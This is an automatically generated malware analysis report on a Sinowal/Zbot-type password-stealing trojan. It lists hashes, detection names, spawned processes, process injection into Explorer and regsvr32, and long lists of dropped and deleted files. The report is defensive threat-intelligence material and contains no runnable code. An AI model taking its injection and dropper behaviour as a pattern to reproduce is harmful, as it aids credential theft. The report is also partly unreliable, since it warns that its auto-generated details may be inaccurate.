Skip to main content

Sinowal_e278feec31


Susp_Dropper (Kaspersky), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR, Sinowal.YR, GenericInjector.YR, BackdoorCaphaw_QKKBAL.YR, TrojanPSWZbot.YR (Lavasoft MAS)Behaviour: Trojan-PSW, Trojan, Backdoor

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: e278feec31e3ed63cbe4a7d85517daea

SHA1: 040894a3e4f22f3189a850ff0a36c4c1ad63067d

SHA256: dc864301b3ed3e0fd2be94326b3fb581d1c627ef65247d5cfd8e8174ec1612f5

SSDeep: 6144:Yykr06hjRDWkYTZkdmqSymbyDGT5cM5RkgB809T3pU03HW2:YLr06nWkW8kymsGPqgz9Ty03HJ

Size: 269312 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: BorlandDelphi30, UPolyXv05_v6

Company: no certificate found

Created at: 2015-08-12 17:32:56

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan-PSW. Trojan program intended for stealing users passwords.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1480
mofcomp.exe:3476
WindowsXP-KB968930-x86-ENG.exe:3964
new.exe:3064
net1.exe:2460
tasklist.exe:2264
ngen.exe:3596
ngen.exe:3168
ngen.exe:3676
ngen.exe:3300
ngen.exe:856
ngen.exe:2988
ngen.exe:3172
ngen.exe:1960
ngen.exe:1944
ngen.exe:420
ngen.exe:916
ngen.exe:3936
ngen.exe:3996
ngen.exe:1868
ngen.exe:2188
ngen.exe:2952
ngen.exe:3560
ngen.exe:3224
ngen.exe:1724
ngen.exe:3220
ngen.exe:1976
ngen.exe:2164
ngen.exe:648
update.exe:4040
net.exe:2156
net.exe:2224
net.exe:2416
hostname.exe:1384
PSCustomSetupUtil.exe:620
PSCustomSetupUtil.exe:452
PSCustomSetupUtil.exe:3908
PSCustomSetupUtil.exe:1924
PSCustomSetupUtil.exe:2196
PSCustomSetupUtil.exe:3064
PSCustomSetupUtil.exe:2308
PSCustomSetupUtil.exe:2224
PSCustomSetupUtil.exe:3696
PSCustomSetupUtil.exe:3856
PSCustomSetupUtil.exe:2176
PSCustomSetupUtil.exe:2244
PSCustomSetupUtil.exe:2112
PSCustomSetupUtil.exe:2240
PSCustomSetupUtil.exe:3992
PSCustomSetupUtil.exe:2288
PSCustomSetupUtil.exe:2344
PSCustomSetupUtil.exe:3952
PSCustomSetupUtil.exe:2552
PSCustomSetupUtil.exe:1496
PSCustomSetupUtil.exe:264
PSCustomSetupUtil.exe:1868
PSCustomSetupUtil.exe:1284
PSCustomSetupUtil.exe:2332
PSCustomSetupUtil.exe:2556
PSCustomSetupUtil.exe:2140
ipconfig.exe:1240
yfenaromaf.exe:1664
PSSetupNativeUtils.exe:1932
mscorsvw.exe:4008
mscorsvw.exe:3128
mscorsvw.exe:2592
mscorsvw.exe:2732
mscorsvw.exe:3104
mscorsvw.exe:2284
mscorsvw.exe:3484
mscorsvw.exe:2168
mscorsvw.exe:2072
mscorsvw.exe:3084
mscorsvw.exe:2408
mscorsvw.exe:828
regsvr32.exe:3404
regsvr32.exe:3200
wsmanhttpconfig.exe:3232
wsmanhttpconfig.exe:1960
netsh.exe:2304
bindata865.exe:3088

The Trojan injects its code into the following process(es):

new.exe:3664
regsvr32.exe:3384
regsvr32.exe:3264
Explorer.EXE:1572

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:1480 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Olifiqtu\yfenaromaf.exe (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (4545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (7385 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpfa60f4ad.bat (177 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmp1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmp2.tmp (0 bytes)

The process mofcomp.exe:3476 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\wbem\Logs\mofcomp.log (1814 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (1 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\tmpD4.tmp (0 bytes)

The process WindowsXP-KB968930-x86-ENG.exe:3964 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\ea4acb66495575d6b9f323\powershell_ise.exe (2526 bytes)
C:\ea4acb66495575d6b9f323\about_transactions.help.txt (1011 bytes)
C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (17 bytes)
C:\ea4acb66495575d6b9f323\wsmplpxy.dll (603 bytes)
C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (12 bytes)
C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (316 bytes)
C:\ea4acb66495575d6b9f323\about_jobs.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\$shtdwn$.req (788 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe (7339 bytes)
C:\ea4acb66495575d6b9f323\update\updspapi.dll (5940 bytes)
C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (998 bytes)
C:\ea4acb66495575d6b9f323\importallmodules.psd1 (438 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\winrm.vbs (2727 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (900 bytes)
C:\ea4acb66495575d6b9f323\update\update.exe (10748 bytes)
C:\ea4acb66495575d6b9f323\about_job_details.help.txt (824 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (950 bytes)
C:\ea4acb66495575d6b9f323\about_locations.help.txt (794 bytes)
C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.dll (1842 bytes)
C:\ea4acb66495575d6b9f323\about_return.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\spuninst.exe (3787 bytes)
C:\ea4acb66495575d6b9f323\about_remote.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\wevtfwd.dll (3351 bytes)
C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (16567 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (962 bytes)
C:\ea4acb66495575d6b9f323\about_arrays.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_trap.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (7 bytes)
C:\ea4acb66495575d6b9f323\about_break.help.txt (792 bytes)
C:\ea4acb66495575d6b9f323\registry.format.ps1xml (20 bytes)
C:\ea4acb66495575d6b9f323\spmsg.dll (495 bytes)
C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (133 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll (3118 bytes)
C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (590 bytes)
C:\ea4acb66495575d6b9f323\about_redirection.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (20810 bytes)
C:\ea4acb66495575d6b9f323\about_aliases.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_operators.help.txt (770 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (2472 bytes)
C:\ea4acb66495575d6b9f323\about_throw.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (9738 bytes)
C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (21 bytes)
C:\ea4acb66495575d6b9f323\wsmwmipl.dll (2816 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (453 bytes)
C:\ea4acb66495575d6b9f323\wsmtxt.xsl (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.cmd (35 bytes)
C:\ea4acb66495575d6b9f323\about_split.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (1737 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_history.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (13 bytes)
C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (837 bytes)
C:\ea4acb66495575d6b9f323\about_properties.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\pwrshplugin.dll (802 bytes)
C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (344 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (508 bytes)
C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (481 bytes)
C:\ea4acb66495575d6b9f323\about_signing.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\about_do.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\winrm.ini (1956 bytes)
C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (8740 bytes)
C:\ea4acb66495575d6b9f323\help.format.ps1xml (3947 bytes)
C:\$Directory (800 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (168 bytes)
C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (14450 bytes)
C:\ea4acb66495575d6b9f323\winrshost.exe (22 bytes)
C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (887 bytes)
C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (411 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (1532 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll (38414 bytes)
C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\winrsmgr.dll (2 bytes)
C:\ea4acb66495575d6b9f323\wsmprovhost.exe (657 bytes)
C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll (1537 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (4408 bytes)
C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (379 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (408 bytes)
C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (26041 bytes)
C:\ea4acb66495575d6b9f323\about_functions.help.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_providers.help.txt (59 bytes)
C:\ea4acb66495575d6b9f323\wsmsvc.dll (15909 bytes)
C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (37 bytes)
C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (155 bytes)
C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (595 bytes)
C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (8 bytes)
C:\ea4acb66495575d6b9f323\about_profiles.help.txt (457 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (16 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (1145 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe.mui (10 bytes)
C:\ea4acb66495575d6b9f323\about_for.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\winrs.exe (1154 bytes)
C:\ea4acb66495575d6b9f323\about_prompts.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\winrssrv.dll (12 bytes)
C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (146 bytes)
C:\ea4acb66495575d6b9f323\pwrshsip.dll (24 bytes)
C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (7 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (3386 bytes)
C:\ea4acb66495575d6b9f323\about_parsing.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (14 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll (5010 bytes)
C:\ea4acb66495575d6b9f323\update\spcustom.dll (23 bytes)
C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (470 bytes)
C:\ea4acb66495575d6b9f323\about_objects.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (659 bytes)
C:\ea4acb66495575d6b9f323\wsmres.dll (6164 bytes)
C:\ea4acb66495575d6b9f323\update (4 bytes)
C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_switch.help.txt (489 bytes)
C:\ea4acb66495575d6b9f323\about_methods.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\wsmpty.xsl (1 bytes)
C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (11 bytes)
C:\ea4acb66495575d6b9f323\update\eula.txt (586 bytes)
C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (405 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (562 bytes)
C:\ea4acb66495575d6b9f323\default.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (15 bytes)
C:\ea4acb66495575d6b9f323\about_continue.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (33 bytes)
C:\ea4acb66495575d6b9f323\profile.ps1 (772 bytes)
C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (1797 bytes)
C:\ea4acb66495575d6b9f323\spupdsvc.exe (287 bytes)
C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (276 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (778 bytes)
C:\ea4acb66495575d6b9f323\about_scripts.help.txt (12 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll (9684 bytes)
C:\ea4acb66495575d6b9f323\eventforwarding.adm (2 bytes)
C:\ea4acb66495575d6b9f323\about_foreach.help.txt (10 bytes)
C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (1492 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.dll (591 bytes)
C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (266 bytes)
C:\ea4acb66495575d6b9f323\about_join.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\about_ref.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\winrscmd.dll (2907 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (2301 bytes)
C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\types.ps1xml (2510 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (28236 bytes)
C:\ea4acb66495575d6b9f323\about_while.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (574 bytes)
C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (3009 bytes)
C:\ea4acb66495575d6b9f323\update\update.inf (2457 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (3153 bytes)
C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (9 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (9 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\wtrinstaller.ico (4803 bytes)
C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (417 bytes)
C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (512 bytes)
C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (775 bytes)
C:\ea4acb66495575d6b9f323\about_variables.help.txt (6 bytes)
C:\ea4acb66495575d6b9f323\update\update.ver (14 bytes)
C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (16 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.mof (789 bytes)
C:\ea4acb66495575d6b9f323\about_requires.help.txt (2 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.mof (4 bytes)
C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (1 bytes)
C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (221 bytes)
C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (5 bytes)
C:\ea4acb66495575d6b9f323\about_scopes.help.txt (76 bytes)
C:\ea4acb66495575d6b9f323\pspluginwkr.dll (1756 bytes)
C:\ea4acb66495575d6b9f323\about_modules.help.txt (13 bytes)
C:\ea4acb66495575d6b9f323\about_if.help.txt (3 bytes)
C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (9 bytes)
C:\ea4acb66495575d6b9f323\pwrshmsg.dll (4 bytes)
C:\ea4acb66495575d6b9f323\about_parameters.help.txt (9 bytes)

The Trojan deletes the following file(s):

C:\ea4acb66495575d6b9f323\about_transactions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_format.ps1xml.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmplpxy.dll (0 bytes)
C:\ea4acb66495575d6b9f323\windowsremoteshell.adm (0 bytes)
C:\ea4acb66495575d6b9f323\pscustomsetuputil.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_return.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe (0 bytes)
C:\ea4acb66495575d6b9f323\update\updspapi.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_command_syntax.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_bits_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll (0 bytes)
C:\ea4acb66495575d6b9f323\importallmodules.psd1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.vbs (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_job_details.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.psd1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_locations.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\getevent.types.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_jobs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\spuninst.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_session_configurations.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pssetupnativeutils.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_wmi_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_parameters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_arrays.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_trap.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssession_details.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_path_syntax.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_break.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\registry.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\filesystem.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_advanced_methods.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_throw.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_redirection.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_regular_expressions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\diagnostics.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_debuggers.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmwmipl.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_2.0.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmtxt.xsl (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.cmd (0 bytes)
C:\ea4acb66495575d6b9f323\about_split.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\compiledcomposition.microsoft.powershell.gpowershell.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\spmsg.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_history.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_environment_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_aliases.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsman.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_properties.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_wildcards.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershelltrace.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.utility.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_signing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_do.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrm.ini (0 bytes)
C:\ea4acb66495575d6b9f323\about_script_internationalization.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.exe (0 bytes)
C:\ea4acb66495575d6b9f323\help.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_arithmetic_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_escape_characters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_output.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrshost.exe (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_pipelines.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\powershell.exe.mui (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_jobs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_parsing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmprovhost.exe (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_assignment_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\types.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions.help.txt (0 bytes)
C:\_521718_ (0 bytes)
C:\ea4acb66495575d6b9f323\about_providers.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmsvc.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_type_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_preference_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.dll (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshsip.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_commonparameters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\certificate.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_comment_based_help.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wevtfwd.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_command_precedence.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_profiles.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\bitstransfer.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.backgroundintelligenttransfer.management.interop.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_for.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrs.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_prompts.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrssrv.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_troubleshooting.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_eventlogs.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_try_catch_finally.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_special_characters.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrsmgr.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_automatic_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_windows_powershell_ise.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\spcustom.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssnapins.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.diagnostics.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_objects.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\winrscmd.dll (0 bytes)
C:\ea4acb66495575d6b9f323\update (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_requirements.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_switch.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_methods.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmpty.xsl (0 bytes)
C:\ea4acb66495575d6b9f323\about_language_keywords.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\eula.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_ws-management_cmdlets.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.editor.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\default.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_comparison_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_continue.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_logical_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.runtime.dll (0 bytes)
C:\ea4acb66495575d6b9f323\profile.ps1 (0 bytes)
C:\ea4acb66495575d6b9f323\about_script_blocks.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\spupdsvc.exe (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_types.ps1xml.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_scripts.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.wsman.management.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\eventforwarding.adm (0 bytes)
C:\ea4acb66495575d6b9f323\about_foreach.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_execution_policies.help.txt (0 bytes)
